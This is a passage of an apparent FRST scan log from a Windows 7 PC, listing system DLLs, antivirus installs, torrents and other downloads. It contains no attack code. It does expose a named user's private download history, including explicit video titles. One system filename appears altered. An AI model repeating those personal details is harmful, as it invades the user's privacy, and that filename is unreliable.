2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:31 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:19 - 004000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2018-01-28 21:34 - 2017-02-09 19:19 - 003945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2018-01-28 21:34 - 2017-02-09 19:16 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:14 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 19:03 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2018-01-28 21:34 - 2017-02-09 19:03 - 000062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2018-01-28 21:34 - 2017-02-09 19:03 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstospam_detected.exe
2018-01-28 21:34 - 2017-02-09 19:02 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2018-01-28 21:34 - 2017-02-09 19:00 - 003220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2018-01-28 21:34 - 2017-02-09 18:59 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2018-01-28 21:34 - 2017-02-09 18:58 - 000296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2018-01-28 21:34 - 2017-02-09 18:55 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2018-01-28 21:34 - 2017-02-09 18:55 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2018-01-28 21:34 - 2017-02-09 18:55 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2018-01-28 21:34 - 2017-02-09 18:54 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2018-01-28 21:34 - 2017-02-09 18:54 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2018-01-28 21:34 - 2017-02-09 18:53 - 000050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2018-01-28 21:34 - 2017-02-09 18:51 - 000032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2018-01-28 21:34 - 2017-02-09 18:50 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2018-01-28 21:34 - 2017-02-09 18:50 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2018-01-28 21:34 - 2017-02-09 18:50 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2018-01-28 21:34 - 2017-02-09 18:50 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2018-01-28 21:34 - 2017-02-09 18:49 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2018-01-28 21:34 - 2017-02-09 18:49 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2018-01-28 21:34 - 2017-02-06 19:14 - 000733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2018-01-28 21:34 - 2017-01-13 21:00 - 000976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2018-01-28 21:34 - 2017-01-13 21:00 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2018-01-28 21:34 - 2017-01-13 20:45 - 000741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2018-01-28 21:34 - 2017-01-13 20:45 - 000084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2018-01-28 21:34 - 2017-01-11 21:01 - 001887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2018-01-28 21:34 - 2017-01-11 21:01 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2018-01-28 21:34 - 2017-01-11 20:43 - 001241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2018-01-28 21:34 - 2017-01-11 20:43 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2018-01-28 21:34 - 2017-01-06 21:00 - 001574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2018-01-28 21:34 - 2017-01-06 20:44 - 001329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2018-01-28 21:34 - 2016-11-20 17:07 - 000467392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2018-01-28 21:34 - 2016-10-08 16:06 - 000633296 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-01-28 21:34 - 2016-05-12 16:05 - 000297984 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2018-01-28 21:34 - 2016-05-12 16:04 - 000249352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2018-01-28 21:34 - 2016-03-24 01:43 - 000457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2018-01-28 21:34 - 2016-03-24 01:40 - 000546656 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2018-01-28 21:23 - 2018-01-28 21:23 - 034790450 _____ C:\Users\Markus\Downloads\windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
2018-01-28 20:13 - 2018-01-28 20:13 - 000566381 _____ C:\Users\Markus\Downloads\uvs_update.zip
2018-01-28 20:12 - 2018-01-28 20:13 - 002973143 _____ C:\Users\Markus\Downloads\uvs_v400.zip
2018-01-28 18:39 - 2018-01-28 18:39 - 000000242 _____ C:\Windows\system32\Partizan.RRI
2018-01-28 15:12 - 2018-01-28 19:57 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-01-27 22:00 - 2018-01-27 22:00 - 000000000 ____D C:\Android
2018-01-27 21:58 - 2018-01-27 21:58 - 000000000 ____D C:\.Trash
2018-01-27 21:22 - 2018-01-27 21:22 - 000068399 _____ C:\Users\Markus\Downloads\Remix_OS_for_PC_Android_M_32bit_B2016112201.torrent
2018-01-27 05:07 - 2018-01-27 05:10 - 532928944 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\PhoenixOSInstaller-v1.2.3-277.exe
2018-01-26 22:20 - 2018-01-27 00:14 - 652395424 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\PhoenixOSInstaller_v2.5.8.364_x86_x64.exe
2018-01-26 16:32 - 2018-01-26 23:14 - 610979232 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\PhoenixOSInstaller_v2.5.3.310_x86_x64.exe
2018-01-26 16:28 - 2018-01-26 22:18 - 652395424 _____ (Beijing Chaozhuo Technology Co., Ltd) C:\Users\Markus\Downloads\Не подтвержден 935984.crdownload
2018-01-17 02:27 - 2018-01-17 02:27 - 000011481 _____ C:\Users\Markus\Downloads\[NNM-Club.name]_SpyHunter 4.28.5.4848 RePack (& Portable) by D!akov (09.09.2017).torrent
2018-01-13 14:31 - 2018-01-13 14:31 - 000020582 _____ C:\Users\Markus\Downloads\National Geographic Auto SOS АВТО SOS (1 Сезон,10 серий из 10) [2012, Документальный, SATRip] [rutracker-4742232].torrent
2018-01-13 13:31 - 2018-01-13 13:31 - 000106791 _____ C:\Users\Markus\Downloads\Авто SOS 2 3 4 5 сезон Auto Car SOS (National Geographic Channel) [2013, 2014, 2015, 2016, 2017 Реалити авто шоу, HDTVRip] [rutracker-5057446].torrent
2018-01-10 10:23 - 2018-01-10 10:23 - 000000000 _____ C:\Windows\system32\Tmp7139.tmp
2018-01-03 21:39 - 2018-01-03 21:39 - 000064555 _____ C:\Users\Markus\Downloads\Американские колымаги - 1 сезон American Hot Rod (Discovery) [2004, документальный, TVRip] [rutracker-2641718] (1).torrent
2017-12-28 02:25 - 2017-12-28 02:25 - 076638208 _____ C:\Users\Markus\Downloads\xhamster.com_8656881_mom_not_her_real_daughter_lesbians_240p.mp4
2017-12-28 01:19 - 2017-12-28 01:19 - 002007500 _____ C:\Users\Markus\Downloads\xhamster.com_7399526_self_pee_she_urinates_in_her_mouth_240p.mp4
2017-12-27 16:17 - 2017-12-27 16:17 - 000063521 _____ C:\Users\Markus\Downloads\Amerikanskie_kolyimagi sezon 1[NNM-club].torrent
2017-12-27 16:15 - 2017-12-27 16:15 - 000064555 _____ C:\Users\Markus\Downloads\Американские колымаги - 1 сезон American Hot Rod (Discovery) [2004, документальный, TVRip] [rutracker-2641718].torrent
2017-12-14 20:20 - 2017-12-14 20:20 - 000001922 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2017-12-14 20:20 - 2017-12-14 20:20 - 000000000 ____D C:\Users\Markus\AppData\Roaming\AVAST Software
2017-12-14 20:20 - 2017-12-14 20:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2017-12-14 20:19 - 2017-12-14 20:30 - 000969184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2017-12-14 20:19 - 2017-12-14 20:30 - 000513632 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2017-12-14 20:19 - 2017-12-14 20:30 - 000293352 _____ (AVAST Software) C:\Windows\system32\Drivers\aswvmm.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000391496 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-12-14 20:19 - 2017-12-14 20:19 - 000163416 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000108816 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-12-14 20:19 - 2017-12-14 20:19 - 000000000 ____D C:\Program Files\AVAST Software
2017-12-14 20:18 - 2017-12-14 20:18 - 000000000 ____D C:\Users\Все пользователи\AVAST Software
2017-12-14 20:18 - 2017-12-14 20:18 - 000000000 ____D C:\ProgramData\AVAST Software
2017-12-14 20:00 - 2017-12-14 20:03 - 000455384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys.151327106936904
2017-12-14 19:09 - 2017-12-14 19:13 - 000455384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys.151326806415404
2017-12-14 19:08 - 2017-12-14 19:08 - 000053208 _____ (AVAST Software) C:\Windows\avastSS.scr
2017-12-11 19:40 - 2017-12-11 19:40 - 000001870 _____ C:\Users\Public\Desktop\COMODO Firewall.lnk
2017-12-11 19:40 - 2017-12-11 19:40 - 000000000 ____D C:\Windows\System32\Tasks\COMODO
2017-12-11 19:40 - 2017-12-11 19:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\COMODO
2017-12-11 19:39 - 2017-12-11 19:40 - 000000000 ___SD C:\Users\Все пользователи\Shared Space
2017-12-11 19:39 - 2017-12-11 19:40 - 000000000 ___SD C:\ProgramData\Shared Space
2017-12-11 19:39 - 2017-12-11 19:39 - 000000000 ____D C:\Program Files\COMODO
2017-12-11 19:36 - 2017-12-11 19:36 - 000000000 ____D C:\Users\Все пользователи\Comodo Downloader
2017-12-11 19:36 - 2017-12-11 19:36 - 000000000 ____D C:\ProgramData\Comodo Downloader
2017-12-11 19:19 - 2017-12-11 19:40 - 000000000 ____D C:\Users\Все пользователи\Comodo
2017-12-11 19:19 - 2017-12-11 19:40 - 000000000 ____D C:\ProgramData\Comodo
2017-12-11 19:13 - 2017-12-11 19:13 - 000268464 _____ C:\Users\Markus\Downloads\viewtopic_Comodo Firewall 2014 7.0.313494.4115 Final [Multi_Ru].htm
2017-12-11 19:13 - 2017-12-11 19:13 - 000000000 ____D C:\Users\Markus\Downloads\viewtopic_Comodo Firewall 2014 7.0.313494.4115 Final [Multi_Ru]_files
2017-12-11 18:11 - 2017-12-11 18:11 - 000018378 _____ C:\Users\Markus\Downloads\[NNM-Club.me]_Comodo Firewall 2014 7.0.313494.4115 Final.exe (1).torrent
2017-12-11 17:22 - 2017-12-11 17:22 - 000018378 _____ C:\Users\Markus\Downloads\[NNM-Club.me]_Comodo Firewall 2014 7.0.313494.4115 Final.exe.torrent
2017-12-11 10:54 - 2017-12-11 10:54 - 000018613 _____ C:\Users\Markus\Downloads\[rutor.is]Comodo_Firewall_7.0.317799.4142.exe.torrent
2017-12-11 02:24 - 2017-12-14 20:17 - 000000000 ____D C:\Users\Markus\Documents\Резервные копии реестра CCleaner
2017-12-10 23:56 - 2017-12-10 23:56 - 004928780 _____ C:\Users\Markus\Downloads\COMODO Products Uninstaller.rar
2017-12-10 23:42 - 2017-12-10 23:43 - 000037483 _____ C:\Users\Markus\Downloads\[NNM-Club.me]_AV Uninstall Tools Pack 2014.06.torrent
2017-12-10 15:20 - 2017-12-10 15:21 - 069534888 _____ (COMODO) C:\Users\Markus\Downloads\cispremium_only_installer.exe
2017-12-10 15:05 - 2017-12-10 15:05 - 005500784 _____ (COMODO) C:\Users\Markus\Downloads\cav_installer.exe
2017-12-10 14:38 - 2017-12-10 14:38 - 008893232 _____ (AVAST Software) C:\Users\Markus\Downloads\avastclear.exe
2017-12-10 13:41 - 2017-12-10 13:41 - 000000000 ____D C:\Windows\System32\Tasks\Avast Software
2017-12-10 13:39 - 2017-12-10 13:39 - 000000000 ____D C:\Program Files\Common Files\Avast Software
2017-12-10 13:34 - 2017-12-10 14:23 - 000000000 _____ C:\Windows\SysWOW64\last.dump
2017-12-10 13:27 - 2018-01-09 20:20 - 000003920 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-12-09 14:37 - 2017-12-09 14:37 - 000000000 _____ C:\Windows\system32\TmpD7C7.tmp
2017-12-07 16:14 - 2017-12-07 16:14 - 000000000 _____ C:\Windows\system32\Tmp69F8.tmp
2017-12-06 18:18 - 2017-12-06 18:18 - 000000000 _____ C:\Windows\system32\Tmp692D.tmp
2017-11-30 22:33 - 2017-11-30 22:33 - 000001179 _____ C:\Users\Markus\Desktop\AIDA64 Extreme.lnk
2017-11-30 22:33 - 2017-11-30 22:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FinalWire
2017-11-30 22:33 - 2017-11-30 22:33 - 000000000 ____D C:\Program Files (x86)\FinalWire
2017-11-28 19:37 - 2017-11-28 19:37 - 000000000 _____ C:\Windows\system32\Tmp8822.tmp
2017-11-26 15:29 - 2017-11-26 15:29 - 000000000 _____ C:\Windows\system32\Tmp5A6E.tmp
2017-11-21 22:55 - 2017-11-21 22:55 - 000326743 _____ C:\Users\Markus\Downloads\Как накрутить очки влияния в War robots.htm
2017-11-21 22:55 - 2017-11-21 22:55 - 000000000 ____D C:\Users\Markus\Downloads\Как накрутить очки влияния в War robots_files
2017-11-20 14:58 - 2017-11-20 14:58 - 000000000 _____ C:\Windows\system32\Tmp8610.tmp
2017-11-17 18:32 - 2017-11-17 18:32 - 000000000 _____ C:\Windows\system32\Tmp94A0.tmp
2017-11-17 17:03 - 2017-11-17 17:03 - 000000000 _____ C:\Windows\system32\Tmp8B3E.tmp
2017-11-15 16:15 - 2017-11-15 16:15 - 000000000 _____ C:\Windows\system32\Tmp5B97.tmp
2017-11-10 14:06 - 2017-11-10 14:06 - 000000000 _____ C:\Windows\system32\Tmp7E53.tmp
==================== Three Months Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2018-02-07 16:29 - 2009-07-14 07:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-02-07 16:29 - 2009-07-14 07:45 - 000021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-02-07 16:22 - 2013-10-04 16:03 - 000000000 ____D C:\Users\Все пользователи\VMware
2018-02-07 16:22 - 2013-10-04 16:03 - 000000000 ____D C:\ProgramData\VMware
2018-02-07 16:22 - 2012-12-17 19:45 - 000000000 ____D C:\Users\Все пользователи\NVIDIA
2018-02-07 16:22 - 2012-12-17 19:45 - 000000000 ____D C:\ProgramData\NVIDIA
2018-02-07 16:20 - 2017-07-20 22:00 - 000000248 _____ C:\Windows\SysWOW64\PARTIZAN.TXT
2018-02-07 16:20 - 2009-07-14 08:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-02-07 13:14 - 2013-09-28 16:40 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.ini
2018-02-07 11:13 - 2013-09-28 18:57 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.bak
2018-02-07 02:58 - 2013-09-28 18:57 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.bk!
2018-02-06 10:31 - 2013-09-28 18:59 - 000014243 _____ C:\Users\Markus\AppData\Roaming\PStrip.bko
2018-02-05 19:05 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\inf
2018-02-05 19:01 - 2012-12-20 22:00 - 000000000 ____D C:\Users\Markus\AppData\Roaming\uTorrent
2018-02-05 12:41 - 2017-08-02 14:38 - 000000000 ____D C:\Users\Markus\AppData\Roaming\IP-TV Player
2018-02-04 14:20 - 2011-04-12 16:26 - 000738622 _____ C:\Windows\system32\perfh019.dat
2018-02-04 14:20 - 2011-04-12 16:26 - 000158066 _____ C:\Windows\system32\perfc019.dat
2018-02-04 14:20 - 2009-07-14 08:13 - 001696786 _____ C:\Windows\system32\PerfStringBackup.INI
2018-02-02 12:36 - 2009-07-14 08:08 - 000032532 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2018-01-31 15:35 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\rescache
2018-01-31 04:21 - 2009-07-14 06:20 - 000000000 ____D C:\Windows\Help
2018-01-29 19:15 - 2016-12-05 22:10 - 000000000 ____D C:\Users\Markus\AppData\Local\NVIDIA Corporation
2018-01-29 19:15 - 2013-10-10 17:43 - 000000000 ____D C:\Users\Markus\AppData\Local\NVIDIA
2018-01-29 19:15 - 2012-12-17 19:45 - 000000000 ____D C:\Users\Все пользователи\NVIDIA Corporation
2018-01-29 19:15 - 2012-12-17 19:45 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-01-29 19:15 - 2012-12-17 19:45 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-01-29 19:15 - 2012-12-17 19:44 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-01-29 19:14 - 2016-12-05 22:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-01-29 18:59 - 2016-11-11 02:31 - 000000000 ____D C:\Users\Все пользователи\Tunngle
2018-01-29 18:59 - 2016-11-11 02:31 - 000000000 ____D C:\ProgramData\Tunngle
2018-01-29 18:50 - 2013-10-04 16:23 - 000000000 ____D C:\Users\Markus\AppData\Roaming\VMware
2018-01-29 18:44 - 2009-07-14 08:32 - 000000000 ____D C:\Windows\system32\FxsTmp
2018-01-29 18:40 - 2013-10-04 16:23 - 000000000 ____D C:\Users\Markus\AppData\Local\VMware
2018-01-29 12:14 - 2013-03-04 20:29 - 000000000 ____D C:\Temp
2018-01-29 02:20 - 2016-10-22 15:36 - 000000466 _____ C:\Users\Markus\AppData\Roaming\prio.ini
2018-01-28 21:36 - 2009-07-14 08:32 - 000000000 ____D C:\Program Files\DVD Maker
2018-01-28 19:57 - 2016-10-06 17:27 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-01-28 18:36 - 2012-12-17 20:57 - 000001876 _____ C:\Users\Markus\Documents\ax_files.xml
2018-01-28 18:32 - 2017-07-20 18:26 - 000000000 ____D C:\Users\Public\Documents\regruninfo
2018-01-28 18:10 - 2017-07-20 18:00 - 000000000 ____D C:\Users\Markus\Documents\RegRun2
2018-01-28 18:09 - 2017-07-20 18:42 - 000000000 ____D C:\Users\Все пользователи\RegRun
2018-01-28 18:09 - 2017-07-20 18:42 - 000000000 ____D C:\ProgramData\RegRun
2018-01-27 23:59 - 2012-12-18 20:39 - 000000000 ____D C:\Users\Markus\AppData\Local\Mozilla
2018-01-27 16:16 - 2012-12-28 02:02 - 000056712 _____ C:\Users\Markus\Desktop\Новый текстовый документ.txt
2018-01-27 00:59 - 2012-12-18 21:10 - 000000000 ____D C:\Users\Markus\AppData\Roaming\Media Player Classic
2018-01-27 00:58 - 2016-12-06 18:07 - 000000000 ____D C:\Users\Markus\AppData\Local\CrashDumps
2018-01-26 13:37 - 2017-09-29 18:25 - 000001129 _____ C:\Users\Markus\Desktop\Facebook Gameroom.lnk
2018-01-26 13:37 - 2017-09-29 18:25 - 000000000 ____D C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2018-01-26 13:37 - 2017-09-29 18:25 - 000000000 ____D C:\Users\Markus\AppData\Local\Facebook
2018-01-24 22:12 - 2017-08-05 14:10 - 000002501 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MWO Portal.lnk
2018-01-24 22:12 - 2017-08-05 14:10 - 000002489 _____ C:\Users\Public\Desktop\MWO Portal.lnk
